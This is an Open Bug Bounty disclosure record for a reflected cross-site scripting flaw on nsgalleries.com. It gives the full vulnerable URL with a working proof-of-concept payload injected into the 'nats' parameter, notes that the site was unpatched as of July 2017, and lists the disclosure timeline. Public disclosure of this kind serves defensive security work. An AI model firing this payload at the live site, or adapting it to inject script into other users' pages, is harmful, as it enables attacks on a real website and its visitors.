nsgalleries.com XSS vulnerability

2016-12-11T21:30:00
ID OBB:197561
Type openbugbounty
Reporter amlnspqr
Modified 2016-12-25T22:13:00

Description

Vulnerable URL:
http://www.nsgalleries.com/hosted2/_NATSHG/hrpics/hh-alia_starr_xander_corvus_DoubleDVixens_HR/index.php?nats="%3E%3Csvg onload=alert(/XSSPOSED/)%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 28290
VIP website status:| Yes
Check nsgalleries.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 11 December, 2016 21:30 GMT
Generic security notifications sent to website owner| 11 December, 2016 21:32 GMT
Notification sent to subscribers (without technical details)| 11 December, 2016 22:17 GMT
Vulnerability details disclosed by researcher| 25 December, 2016 22:13 GMT